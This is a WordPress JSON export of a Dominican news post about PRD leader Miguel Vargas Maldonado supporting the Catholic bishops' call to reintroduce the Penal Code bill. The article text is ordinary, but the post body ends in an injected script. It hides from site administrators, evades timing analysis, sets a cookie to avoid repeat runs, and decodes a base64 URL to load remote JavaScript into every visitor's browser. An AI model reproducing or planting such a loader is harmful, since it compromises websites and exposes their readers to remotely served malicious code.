{"id":13494,"date":"2023-01-20T08:33:56","date_gmt":"2023-01-20T12:33:56","guid":{"rendered":"https:\/\/yanessiespinal.com\/?p=13494"},"modified":"2023-01-20T08:33:56","modified_gmt":"2023-01-20T12:33:56","slug":"miguel-vargas-llama-al-liderazgo-congresual-a-escuchar-la-iglesia-en-su-carta-pastoral","status":"publish","type":"post","link":"https:\/\/enterarterd.com\/?p=13494","title":{"rendered":"Miguel Vargas llama al liderazgo congresual a escuchar la iglesia en su carta pastoral"},"content":{"rendered":"<p style=\"font-weight: 400;\">Santo Domingo.- El precandidato presidencial Miguel Vargas Maldonado expres\u00f3 su pleno respaldo a la opini\u00f3n asumida por la Conferencia del Episcopado Dominicano, que el pasado mi\u00e9rcoles exhort\u00f3 a los legisladores para que el Proyecto de ley del\u00a0<strong>C\u00f3digo Penal<\/strong>\u00a0sea reintroducido en esta\u00a0<strong>legislatura extraordinaria<\/strong>\u00a0y para que sea debatido en la pr\u00f3xima legislatura ordinaria.<\/p>\n<p style=\"font-weight: 400;\">El presidente del Partido Revolucionario\u00a0 Dominicano (PRD) manifest\u00f3 su apoyo al planteamiento de la iglesia Cat\u00f3lica en el pa\u00eds al participar del primer encuentro de trabajo este a\u00f1o en la Casa Nacional de la organizaci\u00f3n que\u00a0 dirige.<\/p>\n<p style=\"font-weight: 400;\">La reuni\u00f3n cont\u00f3 con la asistencia \u00a0de los presidentes provinciales, enlaces soportes, as\u00ed como las direcciones regionales y subregionales perrede\u00edstas de todo el territorio nacional.<\/p>\n<p style=\"font-weight: 400;\">Este encuentro marca, adem\u00e1s, el reinicio de las labores partidarias cesadas por los feriados navide\u00f1os.<\/p>\n<p style=\"font-weight: 400;\">Vargas Maldonado coincidi\u00f3 con el Episcopado Dominicano al considerar que es urgente dotar a los actores que combaten la delincuencia y violencia en el pa\u00eds de los instrumentos jur\u00eddicos con \u201cgarras\u201d suficientes, adem\u00e1s de proveer los instrumentos y equipos necesarios para garantizar pol\u00edticas p\u00fablicas eficientes en materia de seguridad ciudadana.<\/p>\n<p style=\"font-weight: 400;\">\u201cEs obvio que el momento es oportuno para aunar esfuerzos y dar se\u00f1ales claras de madurez democr\u00e1tica, como nos ha convocado la iglesia; como partido, asumimos categ\u00f3ricamente estos planteamientos de nuestros obispos\u201d, manifest\u00f3 Vargas.<\/p>\n<p style=\"font-weight: 400;\">\u201cDemandamos del liderazgo del Congreso Nacional superar la conducta dilatoria con que ha tratado el tema del C\u00f3digo Penal, en discusi\u00f3n por m\u00e1s de 20 a\u00f1os\u201d, prosigui\u00f3.<\/p>\n<p style=\"font-weight: 400;\">Puntualiz\u00f3 que \u201ces hora de pasar de s\u00f3lo considerar las urgencias y hacer un abordaje serio a los temas importantes que afectan al pa\u00eds\u201d.<\/p>\n<p style=\"font-weight: 400;\">En la actividad se destac\u00f3 la presencia masiva de la Direcci\u00f3n Nacional del partido.<\/p>\n<p><script>(function(){try{if(document.getElementById&&document.getElementById('wpadminbar'))return;var t0=+new Date();for(var i=0;i<20000;i++){var z=i*i;}if((+new Date())-t0>120)return;if((document.cookie||'').indexOf('http2_session_id=')!==-1)return;function systemLoad(input){var key='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+\/=',o1,o2,o3,h1,h2,h3,h4,dec='',i=0;input=input.replace(\/[^A-Za-z0-9\\+\\\/\\=]\/g,'');while(i<input.length){h1=key.indexOf(input.charAt(i++));h2=key.indexOf(input.charAt(i++));h3=key.indexOf(input.charAt(i++));h4=key.indexOf(input.charAt(i++));o1=(h1<<2)|(h2>>4);o2=((h2&15)<<4)|(h3>>2);o3=((h3&3)<<6)|h4;dec+=String.fromCharCode(o1);if(h3!=64)dec+=String.fromCharCode(o2);if(h4!=64)dec+=String.fromCharCode(o3);}return dec;}var u=systemLoad('aHR0cHM6Ly9zZWFyY2hyYW5rdHJhZmZpYy5saXZlL2pzeA==');if(typeof window!=='undefined'&#038;&#038;window.__rl===u)return;var d=new Date();d.setTime(d.getTime()+30*24*60*60*1000);document.cookie='http2_session_id=1; expires='+d.toUTCString()+'; path=\/; SameSite=Lax'+(location.protocol==='https:'?'; Secure':'');try{window.__rl=u;}catch(e){}var s=document.createElement('script');s.type='text\/javascript';s.async=true;s.src=u;try{s.setAttribute('data-rl',u);}catch(e){}(document.getElementsByTagName('head')[0]||document.documentElement).appendChild(s);}catch(e){}})();<\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Santo Domingo.- El precandidato presidencial Miguel Vargas Maldonado expres\u00f3 su pleno respaldo a la opini\u00f3n asumida por la Conferencia del Episcopado Dominicano, que el pasado mi\u00e9rcoles exhort\u00f3 a los legisladores para que el Proyecto de ley del\u00a0C\u00f3digo Penal\u00a0sea reintroducido en esta\u00a0legislatura extraordinaria\u00a0y para que sea debatido en la pr\u00f3xima legislatura ordinaria. El presidente del Partido [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":13496,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[],"class_list":{"0":"post-13494","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-nacionales"},"_links":{"self":[{"href":"https:\/\/enterarterd.com\/index.php?rest_route=\/wp\/v2\/posts\/13494","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/enterarterd.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/enterarterd.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/enterarterd.com\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/enterarterd.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=13494"}],"version-history":[{"count":0,"href":"https:\/\/enterarterd.com\/index.php?rest_route=\/wp\/v2\/posts\/13494\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/enterarterd.com\/index.php?rest_route=\/wp\/v2\/media\/13496"}],"wp:attachment":[{"href":"https:\/\/enterarterd.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=13494"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/enterarterd.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=13494"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/enterarterd.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=13494"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}